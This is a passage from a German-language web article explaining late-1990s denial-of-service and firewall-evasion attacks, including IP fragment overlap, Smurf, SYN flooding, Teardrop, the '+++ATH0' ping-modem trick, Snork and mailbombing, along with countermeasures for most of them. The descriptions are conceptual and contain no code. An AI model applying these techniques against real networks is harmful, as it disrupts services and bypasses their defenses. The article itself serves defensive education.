<blockquote>Als eine der erfolgreichsten Angriffsm&ouml;glichkeiten gegen
Sniffer sind solche mit fragmentierten IP-Paketen. TCP-Filter k&ouml;nnen
auch in der Regel nicht mehr sicher unterscheiden, ob die Paket ins interne
Netz gelassen werden d&uuml;rfen, da die Port-Information bei den meisten
Paketen fehlt. Wenn die Zielstation nun auch noch unvollst&auml;ndige Paketfragmentfolgen
auswertet - und jene auch nicht verwirft - kann eine Firewall ohne gr&ouml;ssere
Probleme umgangen werden.
<p>Ein einfacher aber wirkungsvoller Angriff, der IP-Fragmentierung ausnutzt,
ist der sogenannte "overlapping fragment attack" nach RFC 1858. Die derzeitige
<br>Internet-Protokoll Spezifikation RFC 791 beschreibt einen Reassemblierungs-Algorithmus,
der neue Fragmente produziert und dabei jeden &uuml;berlappenden Teil der
<br>zuvor erhaltenen Fragmente &uuml;berschreibt. Wird ein solcher Algorithmus
angewendet, so kann ein Angreifer eine Folge von Paketen konstruieren,
in denen das erste Fragment (mit einem Offset der L&auml;nge Null) harmlose
Daten beinhaltet (und dadurch von einem Paketfilter weitergeleitet werden
kann). Ein beliebiges nachfolgendes Paket mit einem Offset, der gr&ouml;&szlig;er
als Null ist, k&ouml;nnte TCP-Header-Informationen (z.B. destination port)
&uuml;berlappen. Diese w&uuml;rden durch den Algorithmus modifiziert (&uuml;berschrieben).
Dieses zweite Paket wird von vielen Paketfiltern nicht gefiltert. Gegenma&szlig;nahme
hierzu ist, Paketfilter zu verwenden, die ein Minimum an Fragment Offset
f&uuml;r Fragmente verlangen. Nur wenige neuere TCP/IP-Stacks erkennen
dieses Problem und korrigieren dieses. &Auml;ltere Router lassen sich mit
diesem Trick einfach durchtunneln, sie bieten keinen Schutz. Besonders
aber Firewalls, die auf der Basis der Stateful Paket Filterung (SPF) arbeiten,
wie z.B. RAPTOR EAGLE und FIREWALL-1 liessen sich so durchtunneln. Content-Anbieter
im Internet und ISP&acute;s, die mit diesen Firewalls NT-Server sch&uuml;tzen
wollten, wurden so Ziel der unz&auml;hligen Angreifer, die neue Exploits
mal testen wollten.</blockquote>
<a NAME="5.2"></a><b><font size=+2>5.2 Schutzmassnahmen</font></b>
<blockquote>Anfang 1997 war von dieser Attacke so ziemlich alles betroffen,
was einen IP-Stack hatte. Von der Workstation bis zum Drucker war damals
praktisch nichts dagegen gewappnet. Abhilfe schafft nur eine vollst&auml;ndige
Reassemblierung der TCP/IP-Pakete oder der Einsatz eines Proxy. Nachteil
dieser L&ouml;sung ist ein enormer Einbruch in der Performance, der den
Vorteil der SPF-Firewalls v&ouml;llig zunichte macht. Dies zeigt aber,
da&szlig; Firewalls keineswegs perfekt sind. Will man solchen Angriffen
zuvorkommen, so ist man als Betreiber eines mission critical Systems auf
die st&auml;ndige Betreuung eines Experten angewiesen. Da von diesem Angriff
nur spoofende Versionen existieren, k&ouml;nnen die T&auml;ter oft nicht
aufgesp&uuml;rt werden.</blockquote>
</blockquote>
<a NAME="6.0"></a><b><font size=+3>6.0 Smurf</font></b>
<blockquote>Wenn man auf eine Broadcastadresse einen Ping schickt, erzeugt
dieser je nach antwortendem Rechner eine beachtliche Anzahl an Antworten.
Der Trick besteht darin, die Absenderadresse zu f&auml;lschen, so dass
das Opfer die Antworten erh&auml;lt. Sendet man nun rund 1'000 Pakete pro
Sekunde, und 1'000 Rechner ant-worten darauf, bedeutet dies also, dass
1'000'000 Pakete pro Sekunde beim Opfer eintreffen. Die verursacht einen
solchen Traffic, dass der Rechner des Opfers unter dem enormen Verkehr
zusammenbricht.
<p>Dieses Problem war unter dem Namen "ICMP Storm" schon l&auml;nger bekannt,
gewann jedoch erst durch das im Oktober 1997 erscheinende Tool "Smurf"
an Bedeutung f&uuml;r Datenreisende.
<p>Zahlreiche Provider wurden durch solche Attacken tagelang arg bedr&auml;ngt.
Dieses Problem l&auml;sst sich jedoch durch einen einfachen Trick beheben,
indem man an den Routern die IP-Broadcasts nicht mehr in Ethernet-Broadcasts
umsetzen l&auml;sst, und jene somit Aussen vor bleiben.</blockquote>
<a NAME="7.0"></a><b><font size=+3>7.0 SYN-Flooding</font></b>
<blockquote>TCP-Verbindungen werden nach einem Drei-Wege-Handshake aufgebaut,
indem zuerst ein SYN-Paket gesendet wird, darauf mit einem SYN/ACK-Paket
geantwortet wird, und anschliessend die Best&auml;tigung mittels eines
ACK Best&auml;tigung findet.
<p>Nun besteht die SYN-Flood-Attacke daraus dem Opfer beim Handshake eine
falsche Absenderadresse zu &uuml;bermitteln. Das SIN/ACK-Antwortpaket wird
also ins Nirgendwo beantwortet. Wenn nach einiger Zeit keine R&uuml;ckantwort
des ACK-Paketes erfolgt, wird der Verbindungsversuch als erfolglos abgebrochen.
Nutzt man jedoch nun die Zeit bis zum Abbruch damit, dem Opfer eine Unmenge
von SYN-Paketen zu schicken, und ihn somit zu &uuml;berfluten, wird der
Rechner des Opfers in die Knie gehen.
<p>Hier ein Beispiel eines solchen Konversation:
<blockquote>
<li>
Der Angreifer sendet das Paket SYN 1 an sein Opfer.</li>

<li>
Das Opfer antwortet automatisch auf SYN 1 und wartet auf ACK 1.</li>

<li>
Der Angreifer sendet SYN 2.</li>

<li>
Das Opfer antwortet auf SYN 2, wartet nun auf ACK 1 und ACK 2.</li>

<li>
Der Angreifer sendet nun Paket SYN 3.</li>

<li>
usw.</li>

<li>
...</li>
</blockquote>
Diese Flood-Attacke erlebte besonders im Herbst 1996 grossen Aufschwung.</blockquote>
<a NAME="8.0"></a><b><font size=+3>8.0 Teardrop</font></b>
<blockquote>Nahezu wie der "Ping of Death" macht sich "Teardrop" die Fragmentierung
von IP-Paketen zunutze. W&auml;hrend beim "Ping of Death" eine &uuml;bergrosse
Fragmentierung erzeugt wird, &uuml;berlappen sich die Fragmente bei einer
Teardrop-Attacke einfach, und bringen so Windows und Linux ins Schwitzen,
und schlussendlich zum Crash.
<p>Auch diese Attacke wurde gegen Ende 1997 besonders oft gesichtet.
<p>Dem Schrecken wurde aber schnell mit Patches und Updates ein Ende gesetzt.</blockquote>
<a NAME="9.0"></a><b><font size=+3>9.0 Ping-AT-Attacke</font></b>
<blockquote>Der amerikanische Modemhersteller Hayes hat Ende der siebzigerjahre
eine einheitliche, zeilenorientierte und &ouml;ffentliche Befehlssprache
f&uuml;r Modems entwickelt, welche die sogenannten AT-Befehle enth&auml;lt.
Durch diese Befehle wird es m&ouml;glich, dass jedes Modem angesprochen
werden kann, in welches diese einheitliche Sprache implementiert wurde.
Man kann sagen, dass dies heute praktisch bei allen Modems der Fall ist,
so dass jene Modems von den Betriebssystemen und der Software einheitlich
angesprochen werden kann. Sobald sich ein Modem im Offline-Modus befindet,
kann es &uuml;ber AT-Befehle angesprochen werden. Findet ein Wechsel in
den Online-Modus statt, kann das Modem nicht mehr mittels der AT-Befehle
angesprochen werden, da es sich im &Uuml;bertragungsmodus befindet. Dies
kann verhindert werden, indem man dem Modem die Zeichenkette des dreimaligen
Dr&uuml;ckens des Escape-Zeichens sendet, welches als "+++" gekennzeich-net
wird.&nbsp; Dabei wird in den Kommandomodus gewechselt. Aus Sicherheitsgr&uuml;nden
muss zwischen diesem Umschaltkommando in den Kommandomodus und den ersten
AT-Befehl mindestens eine Pause von einer Sekunde vorhanden sein. Einige
Modemhersteller vezichten aus patentrechtlichen Gr&uuml;nden auf eine solche
Pause, so dass bei jenen Modellen der Umschaltbefehl in den Kommandomodus
und ein kompletter AT-Befehl direkt hintereinander eingegeben werden k&ouml;nnen.
Diese Voraussetzung eignet sich f&uuml;r einen gemei-nen Angriff: Man schicht
an einen Empf&auml;nger &uuml;ber das Internet ein spezielles Ping-Paket,
welches zum Bei-spiel die Sequenz "+++ATH0" enth&auml;lt, was das Umschalten
in den Kommandomodus und Beenden der Ver-bindung bedeutet. Laut Ping-Protokoll
antwortet der Rechner des Empf&auml;ngers auf die Ping-Anfrage mit der
Spiegelung des Paketes. Kennt das Modem nun die oben genannte Pause zwischen
dem Umschalten und dem darauffolgenden AT-Paket nicht, wird es den Paketinhalt
des Antwort-Pings als abzuarbeitende Sequenz interepretieren, und die Verbindung
trennen.</blockquote>
<a NAME="10.0"></a><b><font size=+3>10.0 Snork</font></b>
<blockquote>Ende September des Jahres 1998 machte die ISS X-Force auf <a href="http://xforce.iss.net/alerts/advise9.php3">http://xforce.iss.net/alerts/advise9.php3</a>
auf eine neue DoS-Attacke gegen den Windows NT RPC-Service aufmerksam,
welche vom Aufbau her vergleichbar mit den Attacken "Smurf" und "Fraggle"
ist. Diese Attacke erlaubt es einem Angreifer mit minimaler Ausstattung
einem entfernten Windows NT-Rechner 100 % der Prozessor-Leistung und einen
grossen Anspruch der Bandbreite zeitweilens in Anspruch zu nehmen. Die
Verwundbarkeit f&uuml;r Snork ist auf Windows NT 4.0 Workstations und Servern
bis und mit Service-Pack SP4 RC 1.99 vorhanden.</blockquote>

<blockquote><a NAME="10.1"></a><b><font size=+2>10.1 Schutzm&ouml;glichkeiten</font></b>
<blockquote>Microsoft hat einen Patch gegen diese Attacke herausgegeben,
der sich unter <a href="http://www.microsoft.com/security/bulletins/ms98-014.htm">http://www.microsoft.com/security/bulletins/ms98-014.htm</a>
findet. Netzwerkadministratoren k&ouml;nnen interne Systeme von externen
Attacken abschirmen, indem folgende Filter-Regel im Router oder der Firewall
eingegeben wurde: Alle einkommenden UDP-Pakete filtern, die den Destinations-Port
135 und als Source-Port 7, 19 oder 135 haben. Viele Firewall-Komponenten
haben diese Regel schon aktiviert, und sind deshalb schon out of the box
gegen Snork-Attacken ger&uuml;stet.</blockquote>
</blockquote>
<a NAME="11.0"></a><b><font size=+3>11.0 Mailbombing, Spam, Junk-Mail</font></b>
<blockquote><a NAME="11.1"></a><b><font size=+2>11.1 Die Geschichte des
Spam</font></b>
<blockquote>Spam gilt heute als den Erhalt unerw&uuml;nschter (Werbe-)Sendung
in Form von E-Mails. Doch fr&uuml;her w&uuml;rde dieser Ausdruck in den
Gefilden des Usenets gebraucht: Dort wurde damals das Erzwingen des physikalischen
Speicherns ein und der selben Nachricht auf verschiedenen News-Servern
so genannt.</blockquote>
<a NAME="11.2"></a><b><font size=+2>11.2 Die Lage heute</font></b>
<blockquote>Mailbombing ist zusammen mit OOB-Attacken eine der popul&auml;rsten
Formen der DoS-Attacken und wird vorzugsweise von meist jugendlichen T&auml;tern
im Alter zwischen 14 und 18 Jahren ausge&uuml;bt. Dabei wird entweder eine
enorm grosse Nachricht in Form einer E-Mail an die Zieladresse geschickt,
oder mit tausenden von Nachrichten bombadiert. Die dadurch erreichbaren
Ziele sind das Verstopfen eines bestimmten Mail-Accounts, oder gleich das
Verlangsamen oder gar Herunterreissen eines Mail-Servers. Solche Mail-Bombing-Attentate
k&ouml;nnen ohne gr&ouml;ssere Probleme durch im Internet erh&auml;ltliche
Programme durchgef&uuml;hrt werden.</blockquote>
<a NAME="11.3"></a><b><font size=+3>11.3 Schutzm&ouml;glichkeiten</font></b>
<blockquote>Als erstes sollte im Netz nur ungern die private Mail-Adresse
publuziert werden. &Ouml;ffentliche Auftritte sollten h&ouml;chstens mit
der Angabe einer sekund&auml;ren Mail-Adresse bei einem Free-Mail-Anbieter,
wie zum Beispiel yahoo.de, hotmail.de oder gmx.ch quittiert werden. Dadurch
erschliesst sich der Vorteil, dass die Hauptadresse m&ouml;glicherweise
keinen Attacken standhalten muss. Ein vollgem&uuml;llter Free-Mail-Account
l&auml;sst sich auch ohne gr&ouml;ssere Probleme s&auml;ubern oder notfalls
ganz l&ouml;schen.
<p>Eine weitere Schutzmassnahme ist das Filtern eingehender Mails. Am besten
sollte dies schon beim Mail-Gateway durchgef&uuml;hrt werden, falls im
Unternehmen ein solcher vorhanden sein sollte. Die Filterrregeln lassen
sich bei zeitgem&auml;ssen Programmen relativ komfortabel einstellen: So
k&ouml;nnen zum Beispiel bestimmte Absender, Betreff- oder Mail-Inhalte
boykottiert werden. Um unn&ouml;tigen Traffic und m&ouml;gliche Drittpersonen
nicht unn&ouml;tig zu belasten, sollten keine Strike-Back-Attacken oder
Error-Replies genutzt werden, denn meist nutzen Angreifer gestohlene oder
fiktive Absender-Adressen, die solche Antworten gar nicht honorieren w&uuml;rden.</blockquote>
</blockquote>

<hr WIDTH="100%">Siehe auch <a href="../protokolle/icmp.html">ICMP</a>,
<a href="../protokolle/smtp.html">SMTP</a>,
<a href="../protokolle/tcp.html">TCP</a>
<br>
<hr WIDTH="100%">
<div align=right><font point-size="10">Dieser Text ist unverf&auml;lscht
frei kopierbar!</font>
<br><font point-size="10">Marc Ruef &lt;<a href="mailto:marc.ruef@computec.ch?subject=DoS (Denial of Service)">marc.ruef@computec.ch</a>></font>
<br><font point-size="10"><a href="http://www.computec.ch/">http://www.computec.ch/</a></font></div>

</body>
</html>
